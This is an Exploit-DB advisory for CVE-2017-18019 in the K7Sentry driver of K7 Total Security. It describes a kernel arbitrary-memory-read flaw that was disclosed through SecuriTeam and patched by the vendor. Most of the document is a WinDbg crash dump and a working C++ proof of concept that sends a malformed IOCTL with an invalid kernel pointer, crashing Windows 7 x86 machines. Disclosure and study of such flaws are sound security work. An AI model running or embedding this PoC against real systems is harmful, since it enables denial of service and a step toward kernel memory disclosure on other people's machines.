K7 Total Security 15.1.0.305 - Device Driver Arbitrary Memory Read

EDB-ID:

44046


Author:

SecuriTeam

Type:

dos


Platform:

Windows

Date:

2017-10-23


## Vulnerability Summary
The following advisory describes an Crash found in K7 Total Security.

## Credit
An independent security researcher, Kyriakos Economou aka @kyREcon, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program

## Vendor response
K7 has released patches to address this vulnerability – K7TotalSecurity version 15.1.0.305

CVE: CVE-2017-18019

## Vulnerability details
User controlled input to K7Sentry device is not sufficiently sanitized, the user controlled input can be used to compare an arbitrary memory address with a fixed value which in turn can be used to read the content of arbitrary memory.

## Crash report
By sending invalid kernel pointer we can crash the K7 Total Security process as shown here:


```
1: kd> !analyze -v
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except,
it must be protected by a Probe.  Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: f8f8f8f8, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 88c93a63, If non-zero, the instruction address which referenced the bad memory
    address.
Arg4: 00000002, (reserved)

Debugging Details:
------------------

*************************************************************************
***                                                                   ***
***                                                                   ***
***    Your debugger is not using the correct symbols                 ***
***                                                                   ***
***    In order for this command to work properly, your symbol path   ***
***    must point to .pdb files that have full type information.      ***
***                                                                   ***
***    Certain .pdb files (such as the public OS symbols) do not      ***
***    contain the required information.  Contact the group that      ***
***    provided you with these symbols if you need this command to    ***
***    work.                                                          ***
***                                                                   ***
***    Type referenced: kernel32!pNlsUserInfo                         ***
***                                                                   ***
*************************************************************************
*************************************************************************
***                                                                   ***
***                                                                   ***
***    Your debugger is not using the correct symbols                 ***
***                                                                   ***
***    In order for this command to work properly, your symbol path   ***
***    must point to .pdb files that have full type information.      ***
***                                                                   ***
***    Certain .pdb files (such as the public OS symbols) do not      ***
***    contain the required information.  Contact the group that      ***
***    provided you with these symbols if you need this command to    ***
***    work.                                                          ***
***                                                                   ***
***    Type referenced: kernel32!pNlsUserInfo                         ***
***                                                                   ***
*************************************************************************

READ_ADDRESS:  f8f8f8f8 

FAULTING_IP: 
K7Sentry+a63
88c93a63 80384b          cmp     byte ptr [eax],4Bh

MM_INTERNAL_CODE:  2

IMAGE_NAME:  K7Sentry.sys

DEBUG_FLR_IMAGE_TIMESTAMP:  54eda273

MODULE_NAME: K7Sentry

FAULTING_MODULE: 88c93000 K7Sentry

DEFAULT_BUCKET_ID:  VISTA_DRIVER_FAULT

BUGCHECK_STR:  0x50

PROCESS_NAME:  poc.exey_0x950

CURRENT_IRQL:  2

TRAP_FRAME:  9a15ba14 -- (.trap 0xffffffff9a15ba14)
ErrCode = 00000000
eax=f8f8f8f8 ebx=001ffea0 ecx=00000000 edx=001ffe90 esi=9a15bac0 edi=00000010
eip=88c93a63 esp=9a15ba88 ebp=9a15badc iopl=0         nv up ei ng nz na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010386
K7Sentry+0xa63:
88c93a63 80384b          cmp     byte ptr [eax],4Bh         ds:0023:f8f8f8f8=??
Resetting default scope

LAST_CONTROL_TRANSFER:  from 82aebe67 to 82a879d8

STACK_TEXT:  
9a15b564 82aebe67 00000003 bf4bd6ad 00000065 nt!RtlpBreakWithStatusInstruction
9a15b5b4 82aec965 00000003 c0603e38 f8f8f8f8 nt!KiBugCheckDebugBreak+0x1c
9a15b978 82a9a9c5 00000050 f8f8f8f8 00000000 nt!KeBugCheck2+0x68b
9a15b9fc 82a4cf98 00000000 f8f8f8f8 00000000 nt!MmAccessFault+0x104
9a15b9fc 88c93a63 00000000 f8f8f8f8 00000000 nt!KiTrap0E+0xdc
WARNING: Stack unwind information not available. Following frames may be wrong.
9a15badc 82a43129 84a6c1f8 84d9fc30 84d9fc30 K7Sentry+0xa63
9a15baf4 82c3b7af 00000000 84d9fc30 84d9fca0 nt!IofCallDriver+0x63
9a15bb14 82c3eafe 84a6c1f8 84cdcd80 00000000 nt!IopSynchronousServiceTail+0x1f8
9a15bbd0 82c85ac2 00000028 84d9fc30 00000000 nt!IopXxxControlFile+0x810
9a15bc04 82a49db6 00000028 00000000 00000000 nt!NtDeviceIoControlFile+0x2a
9a15bc04 76f16c74 00000028 00000000 00000000 nt!KiSystemServicePostCall
001ffdc8 76f1542c 7504ab4d 00000028 00000000 ntdll!KiFastSystemCallRet
001ffdcc 7504ab4d 00000028 00000000 00000000 ntdll!NtDeviceIoControlFile+0xc
001ffe2c 767fbbc5 00000028 9500286b 001ffe90 KERNELBASE!DeviceIoControl+0xf6
001ffe58 00f51e42 00000028 9500286b 001ffe90 kernel32!DeviceIoControlImplementation+0x80
001ffec4 00f57500 00000001 002a31b0 002a32c0 poc!wmain+0xe2 [e:\k7_2016\k7sentry_0x9500286b_win7_poc\k7sentry_0x9500286b\main.cpp @ 31]
001fff0c 767fef8c 7ffd7000 001fff58 76f3367a poc!__tmainCRTStartup+0xfe [f:\dd\vctools\crt\crtw32\startup\crt0.c @ 255]
001fff18 76f3367a 7ffd7000 76ec24f9 00000000 kernel32!BaseThreadInitThunk+0xe
001fff58 76f3364d 00f5757d 7ffd7000 00000000 ntdll!__RtlUserThreadStart+0x70
001fff70 00000000 00f5757d 7ffd7000 00000000 ntdll!_RtlUserThreadStart+0x1b

STACK_COMMAND:  kb

FOLLOWUP_IP: 
K7Sentry+a63
88c93a63 80384b          cmp     byte ptr [eax],4Bh
```

## Proof of Concept

The PoC has been tested on Windows 7 x86

```
#include <Windows.h>
#include <iostream>
using namespace std;

int wmain()
{

    HANDLE hDevice = CreateFileW(L"\\\\.\\K7Sentry", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);

    if(hDevice == INVALID_HANDLE_VALUE)
    {
        cout << endl << "Failed accessing K7Sentry Device Driver. Error: " << dec << GetLastError() << endl;
        cin.get();
        return 0;
    }

    BYTE dummyBuf[0x20];
    memset(dummyBuf, 0, sizeof(dummyBuf));

    *(ULONG_PTR*)dummyBuf = 0xF8F8F8F8; //INVALID KERNEL POINTER TO TRIGGER PAGE FAULT POC.

    cout << endl << "Sending malformed IOCTL..." << endl;

    DWORD bytesReturned = 0;

    DeviceIoControl(hDevice, 0x9500286B, dummyBuf, sizeof(dummyBuf), dummyBuf, sizeof(dummyBuf), &bytesReturned, NULL);

    cin.get();
    return 0;
}
```